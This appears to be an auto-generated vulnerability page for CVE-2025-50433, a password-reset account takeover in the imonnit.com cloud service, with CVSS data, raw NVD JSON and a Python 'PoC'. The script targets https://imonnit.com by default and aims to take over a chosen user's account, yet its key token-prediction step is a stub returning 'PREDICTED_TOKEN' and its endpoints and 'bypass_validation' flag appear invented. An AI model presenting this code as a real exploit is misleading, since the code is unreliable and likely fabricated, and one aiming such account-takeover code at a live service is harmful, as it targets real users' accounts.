Security Vulnerability Report
中文
CVE-2025-50433 CVSS 9.8 CRITICAL

CVE-2025-50433

Published: 2025-11-26 20:15:49
Last Modified: 2025-12-29 15:46:52

Description

An issue was discovered in imonnit.com (2025-04-24) allowing malicious actors to gain escalated privileges via crafted password reset to take over arbitrary user accounts.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:monnit:imonnit:-:*:*:*:cloud_basic:*:*:* - VULNERABLE
cpe:2.3:a:monnit:imonnit:-:*:*:*:cloud_premiere:*:*:* - VULNERABLE
imonnit.com 所有版本 (2025-04-24前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse # CVE-2025-50433 PoC - Password Reset Privilege Escalation # Target: imonnit.com def exploit_password_reset(target_email, target_url): """ Exploit for CVE-2025-50433 This PoC demonstrates the password reset vulnerability that allows account takeover via crafted reset requests. """ session = requests.Session() # Step 1: Request password reset with target email reset_url = f"{target_url}/api/password-reset" payload = { "email": target_email, "action": "forgot_password" } print(f"[*] Sending password reset request for: {target_email}") response = session.post(reset_url, json=payload) # Step 2: Exploit weak token generation (vulnerability point) # In the actual vulnerability, tokens can be predicted or manipulated exploit_token = predict_reset_token(response) # Step 3: Craft malicious password reset request new_password = "Pwned123!@#" reset_exploit_url = f"{target_url}/api/password-reset/confirm" exploit_payload = { "email": target_email, "token": exploit_token, "new_password": new_password, "bypass_validation": True # Vulnerability allows validation bypass } print(f"[*] Exploiting password reset with crafted token...") exploit_response = session.post(reset_exploit_url, json=exploit_payload) if exploit_response.status_code == 200: print(f"[+] Account takeover successful!") print(f"[+] New password set: {new_password}") return True else: print(f"[-] Exploitation failed") return False def predict_reset_token(response): """ Placeholder for token prediction logic The actual vulnerability involves weak token generation """ return "PREDICTED_TOKEN" if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-50433 PoC') parser.add_argument('--target', required=True, help='Target email') parser.add_argument('--url', default='https://imonnit.com', help='Target URL') args = parser.parse_args() exploit_password_reset(args.target, args.url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50433", "sourceIdentifier": "[email protected]", "published": "2025-11-26T20:15:49.367", "lastModified": "2025-12-29T15:46:51.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in imonnit.com (2025-04-24) allowing malicious actors to gain escalated privileges via crafted password reset to take over arbitrary user accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monnit:imonnit:-:*:*:*:cloud_basic:*:*:*", "matchCriteriaId": "5A6BE212-6C74-422A-A64F-EC40E675915C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:monnit:imonnit:-:*:*:*:cloud_premiere:*:*:*", "matchCriteriaId": "47117C5D-A36E-4C2E-8786-59F9E769E1CC"}]}]}], "references": [{"url": "http://imonnitcom.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://monnit.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/0xMandor/imonnit-ato-advisory/blob/main/CVE-2025-50433.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://youtu.be/-BqcdwHgMMA", "source": "[email protected]", "tags": ["Exploit"]}]}}